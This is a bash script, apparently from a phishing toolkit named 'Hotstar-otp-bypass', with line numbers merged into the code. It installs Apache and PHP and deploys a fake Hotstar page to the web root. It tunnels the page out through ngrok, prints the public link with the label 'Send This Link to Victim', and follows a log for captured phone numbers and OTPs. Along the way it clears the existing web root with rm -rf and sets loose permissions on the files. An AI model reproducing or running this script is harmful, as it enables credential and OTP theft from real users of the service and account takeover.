Path: blob/master/sites/Hotstar-otp-bypass/Hotstar.sh
738 views
#!/bin/bash12stop() {34checkngrok=$(ps aux | grep -o "ngrok" | head -n1)5if [[ $checkngrok == *'ngrok'* ]]; then6pkill -f -2 ngrok > /dev/null 2>&17killall -2 ngrok > /dev/null 2>&18fi9if [[ -e sendlink ]]; then10rm -rf sendlink11fi1213}141516sleep 217# spinner18spinlong ()19{20bar=" +++++++++++++++++++++++++++++++++++++++++++++++++++++++++"21barlenght=${#bar}22i=o23while ((i < 100 )); do24n=$((i*barlenght / 100 ))25printf "\e[00;32m\r[%-${barlenght}s]\e[00m" "${bar:0:n}"26((i += RANDOM%5+2))27sleep 0.428done29}303132#clolors33white='\e[1;37m'34green='\e[0;32m'35blue='\e[1;34m'36red='\e[1;31m'37yellow='\e[1;33m'38echo ""39echo ""40echo ""41clear4243echo -e $green " ╦ ╦╔═╗╔╦╗╔═╗╔╦╗╔═╗╦═╗ ╔═╗╔╦╗╔═╗ ╔╗ ╦ ╦╔═╗╔═╗╔═╗╔═╗ "44echo -e $green " ╠═╣║ ║ ║ ╚═╗ ║ ╠═╣╠╦╝ ║ ║ ║ ╠═╝ ╠╩╗╚╦╝╠═╝╠═╣╚═╗╚═╗ "45echo -e $yellow " ╩ ╩╚═╝ ╩ ╚═╝ ╩ ╩ ╩╩╚═ ╚═╝ ╩ ╩ ╚═╝ ╩ ╩ ╩ ╩╚═╝╚═╝ "46echo -e $white " +++++++++++++++++ OTP BYPASS ++++++++++++++++++ "474849echo ""50echo ""51echo -e $'\e[1;32m[\e[0m\e[1;77m+\e[0m\e[1;32m]\e[0m\e[1;33m >> DOWNLOAD REQUIREMENTS >> \e[0m'52sleep 253echo""54sudo apt-get install apache255apt install php56apt install jq57apt install tail58apt install curl59systemctl start apache260apt install xterm61apt install gnome-terminal62systemctl restart apache2.service63mkdir /var64mkdir /var/www65mkdir /var/www/html66mv /var/www/html/* /var/www/67rm -rf /var/www/html/*68cp -R * /var/www/html/69cd ..70clear71cd /var/www/html/72chmod +x *73chmod 7777 *74sleep 375clear76./ngrok http 80 > /dev/null &7778echo ""79echo -e $'\e[1;31m[\e[0m\e[1;77m+\e[0m\e[1;33m]\e[0m\e[1;92m >> WAIT FOR NGROK UP !\e[0m'80sleep 2581echo ""82clear83./Logo.sh84echo ""85echo -e $yellow "// [ Send This Link to Victim ] //"86echo ""87echo -e $white88curl -s localhost:4040/api/tunnels | jq -r .tunnels[1].public_url89curl -s localhost:4040/api/tunnels | jq -r .tunnels[0].public_url90echo ""91echo ""92echo -e $green "// [ CREDENTIAL ] //"93echo ""94tail -f log.txt | grep -e "phoneNo" -e "OTP"95969798;;99100101102